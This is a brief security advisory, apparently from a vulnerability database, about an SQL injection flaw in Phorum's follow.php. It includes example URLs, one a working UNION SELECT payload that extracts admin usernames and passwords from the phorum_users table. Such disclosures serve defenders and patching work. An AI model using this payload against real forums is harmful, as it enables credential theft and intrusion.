|
Phorum FOLLOW.PHP SQL Injection Vulnerability
Examples sufficient to exploit this vulnerability have been provided: http://www.example.com/phorum5012/follow.php?forum_id=1&,f00=bar,1=waraxe http://www.example.com/phorum5012/follow.php?forum_id=1&thread=waraxe http://www.example.com/phorum5012/follow.php?forum_id=1&,f00=bar,1=-99%20UNION%20ALL%20SELECT%201%2c1%2c1%2c1%2c1%2cCONCAT(username%2c%27|%27%2cpassword)%2c1%2c1%2c1%2c1%2c1%2c1%2c1%2c1%2c1%2c1%2c1%2c1%2c1%2c1%20FROM%20phorum_users%20WHERE%20admin=1 |
|
|
Privacy Statement |